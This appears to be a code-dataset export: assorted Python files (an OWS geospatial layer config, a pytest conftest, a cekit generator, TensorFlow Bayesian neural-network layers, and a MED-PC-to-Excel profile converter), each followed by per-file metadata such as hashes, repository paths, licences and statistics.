            "abstract": """
The count of clear observations is one of the statistical summaries of the Water Observations from Space (WOfS) product that shows how many times an area could be clearly seen (I.e. not affected by clouds, shadows or other satellite observation problems). This product was used as a source layer for calculating all time water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
            "product_name": "ga_ls8c_wofs_2_summary",
            "bands": bands_wofs_2_annual_summary,
            "resource_limits": reslim_wofs,
            "time_resolution": "year",
            "image_processing": {
                "extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
                "always_fetch_bands": [],
                "manual_merge": False,
            },
            "wcs": {
                "native_crs": "EPSG:6933",
                "native_resolution": [30.0, -30.0],
                "default_bands": ["count_clear"],
            },
            "styling": {
                "default_style": "annual_clear_observations",
                "styles": [
                    style_wofs_summary_clear,
                ],
            },
        },
    ],
}
| 54.894928
| 521
| 0.65131
| 1,897
| 15,151
| 5.041645
| 0.12388
| 0.021644
| 0.014952
| 0.024467
| 0.8899
| 0.867001
| 0.852049
| 0.837516
| 0.806148
| 0.796738
| 0
| 0.027199
| 0.264735
| 15,151
| 275
| 522
| 55.094545
| 0.831329
| 0
| 0
| 0.633333
| 0
| 0.1
| 0.687479
| 0.036433
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.0125
| 0.0125
| 0
| 0.0125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
346452b1f32b0e435c3ba8f0b446f34b1ea64fc3
| 229
|
py
|
Python
|
conftest.py
|
luismayta/python-example-elasticsearch
|
4572b03c425f525094d5892ef8c625cfa991174a
|
[
"MIT"
] | 4
|
2019-08-04T19:23:39.000Z
|
2021-04-10T08:26:44.000Z
|
conftest.py
|
luismayta/python-example-elasticsearch
|
4572b03c425f525094d5892ef8c625cfa991174a
|
[
"MIT"
] | 3
|
2019-07-08T20:08:02.000Z
|
2019-07-09T19:47:25.000Z
|
conftest.py
|
luismayta/python-example-elasticsearch
|
4572b03c425f525094d5892ef8c625cfa991174a
|
[
"MIT"
] | 1
|
2019-08-05T05:15:26.000Z
|
2019-08-05T05:15:26.000Z
|
# -*- coding: utf-8 -*-
# Root pytest conftest: pull every fixture from the blog.fixtures packages
# into this module's namespace so pytest auto-discovers them for the whole
# test tree.  The star-imports are deliberate (the standard conftest idiom),
# hence the noqa / pylint suppressions for W0614 (unused) and W0401 (wildcard).
from blog.fixtures.core import * # noqa pylint: disable=W0614,W0401
from blog.fixtures.db import * # noqa pylint: disable=W0614,W0401
from blog.fixtures.data import * # noqa pylint: disable=W0614,W0401
| 45.8
| 68
| 0.729258
| 33
| 229
| 5.060606
| 0.454545
| 0.143713
| 0.287425
| 0.413174
| 0.784431
| 0.784431
| 0.586826
| 0.586826
| 0.586826
| 0
| 0
| 0.126904
| 0.139738
| 229
| 4
| 69
| 57.25
| 0.720812
| 0.524017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3482dac3dbdc133ff9f9ccf502e6d022786c5508
| 268
|
py
|
Python
|
cekit/generator/behave.py
|
nalind/cekit
|
f54345bb2c0f38c19adb7b8afa9272b9264591a9
|
[
"MIT"
] | 1
|
2018-01-17T16:11:57.000Z
|
2018-01-17T16:11:57.000Z
|
cekit/generator/behave.py
|
nalind/cekit
|
f54345bb2c0f38c19adb7b8afa9272b9264591a9
|
[
"MIT"
] | 39
|
2017-12-12T09:32:33.000Z
|
2018-02-27T16:04:48.000Z
|
cekit/generator/behave.py
|
nalind/cekit
|
f54345bb2c0f38c19adb7b8afa9272b9264591a9
|
[
"MIT"
] | 2
|
2017-12-14T17:10:47.000Z
|
2018-01-08T19:16:21.000Z
|
from cekit.generator.base import Generator
class BehaveGenerator(Generator):
    """Generator specialised for Behave-based test runs.

    All real work is delegated to the base ``Generator``; artifact
    preparation is intentionally a no-op for this generator type.
    """

    def __init__(self, descriptor_path, target, overrides):
        # Nothing Behave-specific to initialise beyond the base state.
        super(BehaveGenerator, self).__init__(descriptor_path, target,
                                              overrides)

    def prepare_artifacts(self):
        # Behave generation needs no pre-fetched artifacts.
        pass
| 26.8
| 81
| 0.75
| 29
| 268
| 6.551724
| 0.62069
| 0.147368
| 0.210526
| 0.305263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16791
| 268
| 9
| 82
| 29.777778
| 0.852018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0.166667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
caac437b6e003093294629c1fe986cff030f822c
| 114
|
py
|
Python
|
more_autograding_examples/python_multipart_static_analysis/submissions/p3_bug.py
|
elihschiff/Submitty
|
8b980997b6f1dfcd73eb4cf4cca43398e67f96dc
|
[
"BSD-3-Clause"
] | 411
|
2016-06-14T20:52:25.000Z
|
2022-03-31T21:20:25.000Z
|
more_autograding_examples/python_multipart_static_analysis/submissions/p3_bug.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 5,730
|
2016-05-23T21:04:32.000Z
|
2022-03-31T10:08:06.000Z
|
more_autograding_examples/python_multipart_static_analysis/submissions/p3_bug.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 423
|
2016-09-22T21:11:30.000Z
|
2022-03-29T18:55:28.000Z
|
# Autograder submission example (deliberately imperfect — it is the "bug"
# fixture for the static-analysis exercise, so the computed values must stay
# exactly as in the original).
length, width, height = 5, 16.5, 12.5
volume = length * width * height
area = 2 * length * width + 2 * length * height + 2 * width * height
print('volume =', volume)
print('area =', area)
| 22.8
| 40
| 0.561404
| 26
| 114
| 2.461538
| 0.269231
| 0.140625
| 0.1875
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255319
| 0.175439
| 114
| 4
| 41
| 28.5
| 0.425532
| 0
| 0
| 0
| 0
| 0
| 0.122807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
cac51a734134771bbd81451317dd47c25ee845b1
| 179
|
py
|
Python
|
helloFunc.py
|
treva-123mutebi/Simple-Python-Programs
|
e9c89248a30deaf6f06db0c280aae8363b682317
|
[
"Unlicense"
] | null | null | null |
helloFunc.py
|
treva-123mutebi/Simple-Python-Programs
|
e9c89248a30deaf6f06db0c280aae8363b682317
|
[
"Unlicense"
] | null | null | null |
helloFunc.py
|
treva-123mutebi/Simple-Python-Programs
|
e9c89248a30deaf6f06db0c280aae8363b682317
|
[
"Unlicense"
] | null | null | null |
def hello():
    """Print a fixed three-line greeting (demo of a simple function)."""
    for greeting in ('Howdy!', 'Howdy!!!', 'Hello there.'):
        print(greeting)


# Call the function three times to demonstrate repeated invocation.
for _ in range(3):
    hello()
| 17.9
| 43
| 0.592179
| 21
| 179
| 5.047619
| 0.52381
| 0.207547
| 0.301887
| 0.396226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22905
| 179
| 9
| 44
| 19.888889
| 0.768116
| 0.301676
| 0
| 0.428571
| 0
| 0
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
cadd065f9587460f22de60d61a904fffcf333abd
| 16,585
|
py
|
Python
|
src/model/layers.py
|
divyam3897/ANP_VS
|
237dc06e1170394bdcc3bd7467cc0355232eaa6c
|
[
"MIT"
] | 19
|
2020-06-30T15:46:07.000Z
|
2022-02-28T03:29:55.000Z
|
src/model/layers.py
|
divyam3897/ANP_VS
|
237dc06e1170394bdcc3bd7467cc0355232eaa6c
|
[
"MIT"
] | 2
|
2020-07-04T10:56:05.000Z
|
2020-07-04T10:56:36.000Z
|
src/model/layers.py
|
divyam3897/ANP_VS
|
237dc06e1170394bdcc3bd7467cc0355232eaa6c
|
[
"MIT"
] | 1
|
2021-07-20T12:59:50.000Z
|
2021-07-20T12:59:50.000Z
|
import tensorflow as tf
import numpy as np
import math
# Short aliases for frequently-used TensorFlow ops.
exp = tf.exp


def log(x):
  """Natural log offset by 1e-20 so log(0) never produces -inf."""
  return tf.log(x + 1e-20)


def logit(x):
  """Inverse sigmoid: log(x) - log(1 - x), via the numerically-safe log."""
  return log(x) - log(1 - x)


softplus = tf.nn.softplus
softmax = tf.nn.softmax
tanh = tf.nn.tanh
relu = tf.nn.relu
sigmoid = tf.nn.sigmoid
flatten = tf.layers.flatten
class Dense(object):
  """Fully-connected layer with optional input/output unit masking."""

  def __init__(self, n_in, n_out, name='dense', reuse=None):
    # Create (or reuse) the kernel and bias under a named variable scope.
    with tf.variable_scope(name, reuse=reuse):
      self.W = tf.get_variable('W', shape=[n_in, n_out])
      self.b = tf.get_variable('b', shape=[n_out])

  def __call__(self, x, activation=None, in_mask=None, out_mask=None):
    # Restrict the kernel to the requested rows/columns when masks are given.
    W = self.W
    if in_mask is not None:
      W = tf.gather(W, in_mask, axis=0)
    if out_mask is not None:
      W = tf.gather(W, out_mask, axis=1)
    b = self.b
    if out_mask is not None:
      b = tf.gather(b, out_mask)
    out = tf.matmul(x, W) + b
    if activation is not None:
      out = activation(out)
    return out

  def params(self, trainable=None):
    """Return the layer's variables (independent of any masking)."""
    return [self.W, self.b]
class DenseBayes(object):
  """Bayesian dense layer: factorised Gaussian posterior over the weights.

  Variables are a mean (``mu_*``) and an unconstrained scale (``rho_*``)
  with ``sigma = softplus(rho)``.  At train time weights are drawn with the
  reparameterisation trick; at eval time the posterior mean is used.
  """

  def __init__(self,
               sigma_prior,
               n_in,
               n_out,
               init_rho=None,
               name='dense_bayes',
               reuse=None):
    self.sigma_prior = sigma_prior
    # Uniform(-limit, limit) initialisation with limit = 1/sqrt(fan_in).
    limit = 1.0 / math.sqrt(n_in)
    with tf.variable_scope(name, reuse=reuse):
      self.mu_w = tf.get_variable('mu_w',
                                  shape=[n_in, n_out],
                                  initializer=tf.initializers.random_uniform(
                                      -limit, limit),
                                  dtype=tf.float32)
      self.mu_b = tf.get_variable('mu_b',
                                  shape=[n_out],
                                  initializer=tf.initializers.random_uniform(
                                      -limit, limit),
                                  dtype=tf.float32)
      # Noise tensors consumed by the reparameterised sample in __call__.
      self.epsilon_w = tf.random.normal(shape=[n_in, n_out], mean=0., stddev=1.)
      self.epsilon_b = tf.random.normal(shape=[n_out], mean=0., stddev=1.)
      if init_rho is None:
        self.rho_w = tf.get_variable('rho_w',
                                     shape=[n_in, n_out],
                                     dtype=tf.float32)
        self.rho_b = tf.get_variable('rho_b', shape=[n_out], dtype=tf.float32)
      else:
        self.rho_w = tf.get_variable(
            'rho_w',
            shape=[n_in, n_out],
            initializer=tf.constant_initializer(value=init_rho),
            dtype=tf.float32)
        self.rho_b = tf.get_variable(
            'rho_b',
            shape=[n_out],
            initializer=tf.constant_initializer(value=init_rho),
            dtype=tf.float32)
      self.sigma_w = softplus(self.rho_w)
      self.sigma_b = softplus(self.rho_b)

  def __call__(self, x, train, activation=None, in_mask=None, out_mask=None):
    if train:
      # Reparameterised posterior sample: w = mu + sigma * eps.
      self.W = self.mu_w + tf.multiply(self.sigma_w, self.epsilon_w)
      self.b = self.mu_b + tf.multiply(self.sigma_b, self.epsilon_b)
    else:
      self.W = self.mu_w
      self.b = self.mu_b
    # BUG FIX: the masks previously gathered from self.b using the conv axes
    # (2/3).  For a [n_in, n_out] kernel the input mask selects rows (axis=0)
    # and the output mask selects columns (axis=1), matching Dense.
    W = self.W if in_mask is None else \
        tf.gather(self.W, in_mask, axis=0)
    W = W if out_mask is None else \
        tf.gather(W, out_mask, axis=1)
    b = self.b if out_mask is None else \
        tf.gather(self.b, out_mask)
    x = tf.matmul(x, W) + b
    x = x if activation is None else activation(x)
    return x

  def kl(self):
    """KL(q || prior) of the factorised Gaussian posterior, summed over params."""
    kl_W = (log(tf.divide(self.sigma_prior, self.sigma_w))
            + (tf.square(self.sigma_w) + tf.square(self.mu_w))
            / (2 * tf.square(self.sigma_prior)) - 0.5)
    kl_b = (log(tf.divide(self.sigma_prior, self.sigma_b))
            + (tf.square(self.sigma_b) + tf.square(self.mu_b))
            / (2 * tf.square(self.sigma_prior)) - 0.5)
    return tf.reduce_sum(kl_W) + tf.reduce_sum(kl_b)

  def params(self, trainable=None):
    return [self.mu_w, self.rho_w, self.mu_b, self.rho_b]
class Conv(object):
  """2-D convolution (NCHW layout) with optional channel masking."""

  def __init__(self,
               n_in,
               n_out,
               kernel_size,
               strides=1,
               padding='VALID',
               name='conv',
               reuse=None):
    with tf.variable_scope(name, reuse=reuse):
      self.W = tf.get_variable('W',
                               shape=[kernel_size, kernel_size, n_in, n_out])
      self.b = tf.get_variable('b', shape=[n_out])
    # BUG FIX: was hard-coded to 1, silently ignoring the strides argument.
    self.strides = strides
    self.padding = padding

  def __call__(self, x, activation=None, in_mask=None, out_mask=None):
    # Kernel layout is [kh, kw, in_ch, out_ch]: input channels on axis 2,
    # output channels on axis 3.
    W = self.W if in_mask is None else \
        tf.gather(self.W, in_mask, axis=2)
    # BUG FIX: previously gathered from the bias; the output mask must select
    # output channels of the (possibly input-masked) kernel.
    W = W if out_mask is None else \
        tf.gather(W, out_mask, axis=3)
    b = self.b if out_mask is None else \
        tf.gather(self.b, out_mask)
    x = tf.nn.conv2d(x,
                     W,
                     strides=[1, 1, self.strides, self.strides],
                     padding=self.padding,
                     data_format='NCHW')
    x = tf.nn.bias_add(x, b, data_format='NCHW')
    x = x if activation is None else activation(x)
    return x

  def params(self, trainable=None):
    return [self.W, self.b]
class ConvBayes(object):
  """Bayesian 2-D convolution (NCHW): Gaussian posterior over the kernel."""

  def __init__(self,
               sigma_prior,
               n_in,
               n_out,
               kernel_size,
               init_rho=None,
               strides=1,
               padding='VALID',
               name='conv_bayes',
               reuse=None):
    # BUG FIX: was hard-coded to 1, silently ignoring the strides argument.
    self.strides = strides
    self.padding = padding
    self.sigma_prior = sigma_prior
    self.kernel_size = kernel_size
    # Uniform(-limit, limit) init with limit = 1/sqrt(fan_in * k^2).
    limit = 1.0 / math.sqrt(n_in * kernel_size**2)
    with tf.variable_scope(name, reuse=reuse):
      self.mu_w = tf.get_variable('mu_w',
                                  shape=[kernel_size, kernel_size, n_in, n_out],
                                  initializer=tf.initializers.random_uniform(
                                      -limit, limit),
                                  dtype=tf.float32)
      self.mu_b = tf.get_variable('mu_b',
                                  shape=[n_out],
                                  initializer=tf.initializers.random_uniform(
                                      -limit, limit),
                                  dtype=tf.float32)
      # Noise tensors consumed by the reparameterised sample in __call__.
      self.epsilon_w = tf.random.normal(
          shape=[kernel_size, kernel_size, n_in, n_out], mean=0., stddev=1.)
      self.epsilon_b = tf.random.normal(shape=[n_out], mean=0., stddev=1.)
      if init_rho is None:
        self.rho_w = tf.get_variable(
            'rho_w',
            shape=[kernel_size, kernel_size, n_in, n_out],
            dtype=tf.float32)
        self.rho_b = tf.get_variable('rho_b', shape=[n_out], dtype=tf.float32)
      else:
        self.rho_w = tf.get_variable(
            'rho_w',
            shape=[kernel_size, kernel_size, n_in, n_out],
            initializer=tf.constant_initializer(value=init_rho),
            dtype=tf.float32)
        self.rho_b = tf.get_variable(
            'rho_b',
            shape=[n_out],
            initializer=tf.constant_initializer(value=init_rho),
            dtype=tf.float32)
      self.sigma_w = softplus(self.rho_w)
      self.sigma_b = softplus(self.rho_b)

  def __call__(self, x, train, activation=None, in_mask=None, out_mask=None):
    if train:
      # Reparameterised posterior sample: w = mu + sigma * eps.
      self.W = self.mu_w + tf.multiply(self.sigma_w, self.epsilon_w)
      self.b = self.mu_b + tf.multiply(self.sigma_b, self.epsilon_b)
    else:
      self.W = self.mu_w
      self.b = self.mu_b
    # Kernel layout is [kh, kw, in_ch, out_ch].
    W = self.W if in_mask is None else \
        tf.gather(self.W, in_mask, axis=2)
    # BUG FIX: previously gathered from the bias; the output mask must select
    # output channels of the (possibly input-masked) kernel.
    W = W if out_mask is None else \
        tf.gather(W, out_mask, axis=3)
    b = self.b if out_mask is None else \
        tf.gather(self.b, out_mask)
    x = tf.nn.conv2d(x,
                     W,
                     strides=[1, 1, self.strides, self.strides],
                     padding=self.padding,
                     data_format='NCHW')
    x = tf.nn.bias_add(x, b, data_format='NCHW')
    x = x if activation is None else activation(x)
    return x

  def kl(self):
    """KL(q || prior), summed over kernel and bias."""
    kl_W = (log(tf.divide(self.sigma_prior, self.sigma_w))
            + (tf.square(self.sigma_w) + tf.square(self.mu_w))
            / (2 * tf.square(self.sigma_prior)) - 0.5)
    kl_b = (log(tf.divide(self.sigma_prior, self.sigma_b))
            + (tf.square(self.sigma_b) + tf.square(self.mu_b))
            / (2 * tf.square(self.sigma_prior)) - 0.5)
    return tf.reduce_sum(kl_W) + tf.reduce_sum(kl_b)

  def params(self, trainable=None):
    return [self.mu_w, self.rho_w, self.mu_b, self.rho_b]
class BatchNorm(object):
  """Batch normalisation with explicit running statistics and unit masking."""

  def __init__(self,
               n_in,
               momentum=0.99,
               beta_initializer=tf.zeros_initializer(),
               gamma_initializer=tf.ones_initializer(),
               name='batch_norm',
               reuse=None):
    self.momentum = momentum
    with tf.variable_scope(name, reuse=reuse):
      # Non-trainable running statistics, updated via the UPDATE_OPS
      # collection during training.
      self.moving_mean = tf.get_variable('moving_mean', [n_in],
                                         initializer=tf.zeros_initializer(),
                                         trainable=False)
      self.moving_var = tf.get_variable('moving_var', [n_in],
                                        initializer=tf.ones_initializer(),
                                        trainable=False)
      self.beta = tf.get_variable('beta', [n_in], initializer=beta_initializer)
      self.gamma = tf.get_variable('gamma', [n_in],
                                   initializer=gamma_initializer)

  def __call__(self, x, train, mask=None):
    # Restrict every per-channel quantity to the masked channels, if any.
    if mask is None:
      beta, gamma = self.beta, self.gamma
      moving_mean, moving_var = self.moving_mean, self.moving_var
    else:
      beta = tf.gather(self.beta, mask)
      gamma = tf.gather(self.gamma, mask)
      moving_mean = tf.gather(self.moving_mean, mask)
      moving_var = tf.gather(self.moving_var, mask)
    if train:
      if len(x.shape) == 4:
        # The fused kernel computes batch statistics itself (NCHW layout).
        x, batch_mean, batch_var = tf.nn.fused_batch_norm(
            x, gamma, beta, data_format='NCHW')
      else:
        batch_mean, batch_var = tf.nn.moments(x, [0])
        x = tf.nn.batch_normalization(x, batch_mean, batch_var, beta, gamma,
                                      1e-3)
      # Register exponential-moving-average updates as UPDATE_OPS so the
      # training loop can run them alongside the optimiser step.
      tf.add_to_collection(
          tf.GraphKeys.UPDATE_OPS,
          moving_mean.assign_sub(
              (1 - self.momentum) * (moving_mean - batch_mean)))
      tf.add_to_collection(
          tf.GraphKeys.UPDATE_OPS,
          moving_var.assign_sub((1 - self.momentum) * (moving_var - batch_var)))
    else:
      if len(x.shape) == 4:
        x, batch_mean, batch_var = tf.nn.fused_batch_norm(
            x, gamma, beta, mean=moving_mean, variance=moving_var,
            is_training=False, data_format='NCHW')
      else:
        x = tf.nn.batch_normalization(x, moving_mean, moving_var, beta, gamma,
                                      1e-3)
    return x

  def params(self, trainable=None):
    """Trainable params; running stats are appended when trainable is None."""
    result = [self.beta, self.gamma]
    if trainable is None:
      result = result + [self.moving_mean, self.moving_var]
    return result
class BatchNormBayes(object):
  """Bayesian batch normalisation: Gaussian posteriors over gamma and beta.

  Running statistics are kept as plain non-trainable variables exactly as in
  BatchNorm; only the affine parameters are treated probabilistically.
  """

  def __init__(self,
               sigma_prior,
               n_in,
               init_rho=None,
               momentum=0.99,
               beta_initializer=tf.zeros_initializer(),
               gamma_initializer=tf.ones_initializer(),
               name='batch_norm_bayes',
               reuse=None):
    self.momentum = momentum
    self.sigma_prior = sigma_prior
    with tf.variable_scope(name, reuse=reuse):
      self.moving_mean = tf.get_variable('moving_mean', [n_in],
                                         initializer=tf.zeros_initializer(),
                                         trainable=False)
      self.moving_var = tf.get_variable('moving_var', [n_in],
                                        initializer=tf.ones_initializer(),
                                        trainable=False)
      # Posterior means for the scale (gamma) and shift (beta).
      self.mu_gamma = tf.get_variable(
          'mu_gamma',
          shape=[n_in],
          initializer=tf.initializers.random_uniform(0, 1))
      self.mu_beta = tf.get_variable('mu_beta',
                                     shape=[n_in],
                                     initializer=tf.zeros_initializer())
      # Noise tensors for the reparameterised samples drawn in __call__.
      self.epsilon_gamma = tf.random.normal(shape=[n_in], mean=0., stddev=1.)
      self.epsilon_beta = tf.random.normal(shape=[n_in], mean=0., stddev=1.)
      if init_rho is None:
        self.rho_gamma = tf.get_variable('rho_gamma', shape=[n_in])
        self.rho_beta = tf.get_variable('rho_beta', shape=[n_in])
      else:
        self.rho_gamma = tf.get_variable(
            'rho_gamma',
            shape=[n_in],
            initializer=tf.constant_initializer(value=init_rho))
        self.rho_beta = tf.get_variable(
            'rho_beta',
            shape=[n_in],
            initializer=tf.constant_initializer(value=init_rho))
      self.sigma_gamma = softplus(self.rho_gamma)
      self.sigma_beta = softplus(self.rho_beta)

  def __call__(self, x, train, mask=None):
    if train:
      # Sample gamma/beta with the reparameterisation trick.
      self.gamma = self.mu_gamma + tf.multiply(self.sigma_gamma,
                                               self.epsilon_gamma)
      self.beta = self.mu_beta + tf.multiply(self.sigma_beta,
                                             self.epsilon_beta)
    else:
      self.gamma = self.mu_gamma
      self.beta = self.mu_beta
    # Restrict every per-channel quantity to the masked channels, if any.
    if mask is None:
      beta, gamma = self.beta, self.gamma
      moving_mean, moving_var = self.moving_mean, self.moving_var
    else:
      beta = tf.gather(self.beta, mask)
      gamma = tf.gather(self.gamma, mask)
      moving_mean = tf.gather(self.moving_mean, mask)
      moving_var = tf.gather(self.moving_var, mask)
    if train:
      if len(x.shape) == 4:
        # The fused kernel computes batch statistics itself (NCHW layout).
        x, batch_mean, batch_var = tf.nn.fused_batch_norm(
            x, gamma, beta, data_format='NCHW')
      else:
        batch_mean, batch_var = tf.nn.moments(x, [0])
        x = tf.nn.batch_normalization(x, batch_mean, batch_var, beta, gamma,
                                      1e-3)
      # Register EMA updates of the running statistics as UPDATE_OPS.
      tf.add_to_collection(
          tf.GraphKeys.UPDATE_OPS,
          moving_mean.assign_sub(
              (1 - self.momentum) * (moving_mean - batch_mean)))
      tf.add_to_collection(
          tf.GraphKeys.UPDATE_OPS,
          moving_var.assign_sub((1 - self.momentum) * (moving_var - batch_var)))
    else:
      if len(x.shape) == 4:
        x, batch_mean, batch_var = tf.nn.fused_batch_norm(
            x, gamma, beta, mean=moving_mean, variance=moving_var,
            is_training=False, data_format='NCHW')
      else:
        x = tf.nn.batch_normalization(x, moving_mean, moving_var, beta, gamma,
                                      1e-3)
    return x

  def kl(self):
    """KL divergence between the gamma/beta posteriors and the prior."""
    kl_gamma = (log(tf.divide(self.sigma_prior, self.sigma_gamma))
                + (tf.square(self.sigma_gamma) + tf.square(self.mu_gamma))
                / (2 * tf.square(self.sigma_prior)) - 0.5)
    kl_beta = (log(tf.divide(self.sigma_prior, self.sigma_beta))
               + (tf.square(self.sigma_beta) + tf.square(self.mu_beta))
               / (2 * tf.square(self.sigma_prior)) - 0.5)
    return tf.reduce_sum(kl_gamma) + tf.reduce_sum(kl_beta)

  def params(self, trainable=None):
    result = [self.mu_gamma, self.rho_gamma, self.mu_beta, self.rho_beta]
    if trainable is None:
      result = result + [self.moving_mean, self.moving_var]
    return result
def pool(x, **kwargs):
  """2x2, stride-2 max pooling over a channels-first (NCHW) tensor."""
  return tf.layers.max_pooling2d(
      x, pool_size=2, strides=2, data_format='channels_first', **kwargs)
def global_avg_pool(x):
  """Average an NCHW tensor over its spatial axes, yielding shape (N, C)."""
  spatial_axes = [2, 3]
  return tf.reduce_mean(x, axis=spatial_axes)
| 39.582339
| 100
| 0.526922
| 2,139
| 16,585
| 3.860683
| 0.062179
| 0.045774
| 0.044078
| 0.033907
| 0.888593
| 0.864737
| 0.820659
| 0.80092
| 0.78324
| 0.777549
| 0
| 0.01063
| 0.364727
| 16,585
| 418
| 101
| 39.677033
| 0.773159
| 0
| 0
| 0.790885
| 0
| 0
| 0.0164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061662
| false
| 0
| 0.008043
| 0.016086
| 0.131367
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cafe897840c87ee8b5332d33cbbded213d40b490
| 46,190
|
py
|
Python
|
GEToperant.py
|
SKhoo/GEToperant
|
811860ad9237256edc75f6fec65b5d3608301648
|
[
"MIT"
] | 1
|
2021-11-15T19:37:09.000Z
|
2021-11-15T19:37:09.000Z
|
GEToperant.py
|
SKhoo/GEToperant
|
811860ad9237256edc75f6fec65b5d3608301648
|
[
"MIT"
] | null | null | null |
GEToperant.py
|
SKhoo/GEToperant
|
811860ad9237256edc75f6fec65b5d3608301648
|
[
"MIT"
] | 2
|
2019-08-04T12:05:35.000Z
|
2021-12-01T17:57:18.000Z
|
### This program will collect Med PC data files and match them to a data profile for saving to an Excel workbook.
### Preconditions: All data files must have the same structure and fit the same profile.
### It is recommended to open either multiple files with single subjects or one file with multiple subjects.
### Where an MSN has not used the Y2KCOMPLIANT command, the data was collected in the 21st century.
import xlrd
from openpyxl import load_workbook
import xlsxwriter
import re
import itertools
def convertMRP(GETprofile, profileexport):
    """Convert an MPC2XL row profile (.mrp) into a GEToperant Excel profile.

    GETprofile: path to the .mrp file, expected to hold pairs of lines —
    a label line followed by a target line such as 'A(3)' or a line
    containing 'comment'.
    profileexport: path of the .xlsx profile workbook to create.
    """
    # Read with a context manager so the handle is always closed (the
    # original leaked it).
    with open(GETprofile, 'r') as infile:
        rowprofile = infile.readlines()
    Label = list()
    LabelStartValue = list()
    LabelIncrement = list()
    ArrayVar = list()
    StartElement = list()
    ArrayIncrement = list()
    StopElement = list()
    # Walk the label/target pairs; stopping before the last line means an
    # unpaired trailing label can no longer raise an IndexError.
    for i in range(0, len(rowprofile) - 1, 2):
        target = rowprofile[i + 1]
        ### For each label in the MRP, decide if it is a data value, if so, then import it
        if re.search(r'\D\(\d+\)', target) is not None:
            # Data value such as 'A(3)': record the array letter and element.
            Label.append(rowprofile[i][:-1])
            LabelStartValue.append(None)
            LabelIncrement.append(None)
            ArrayVar.append(target[0])
            StartElement.append(int(re.search(r'\d+', target).group(0)))
            ArrayIncrement.append(0)
            StopElement.append(None)
        elif 'comment' in target.lower():
            # Comments come from the data files rather than a data array.
            Label.append(rowprofile[i][:-1])
            LabelStartValue.append(None)
            LabelIncrement.append(None)
            ArrayVar.append('Comments')
            StartElement.append(0)
            ArrayIncrement.append(0)
            StopElement.append(None)
    output = xlsxwriter.Workbook(profileexport)
    output.set_properties({
        'title': 'GEToperant Profile',
        'subject': 'Animal behaviour',
        'comments': 'MPC2XL Row Profile converted for use with GEToperant. https://github.com/SKhoo/GEToperant'
    })
    mainsheet = output.add_worksheet('GEToperant Profile')
    mainsheet.set_column('A:A', 25)
    mainsheet.set_column('B:G', 15)
    # Header row for the seven profile columns.
    headers = ('Label', 'Label Start Value', 'Label Increment',
               'Array/Variable', 'Start Element', 'Increment Element',
               'Stop Element')
    for col, header in enumerate(headers):
        mainsheet.write(0, col, header)
    # Column H documents the profile format for human readers.
    mainsheet.write(0, 7, 'Converted file: ' + GETprofile)
    mainsheet.write(1, 7, 'Label tells the program what the name the data point')
    mainsheet.write(2, 7, 'Array/Variable tells the program where to look for the data')
    mainsheet.write(3, 7, 'Start Element tells the program which element to extract for that label')
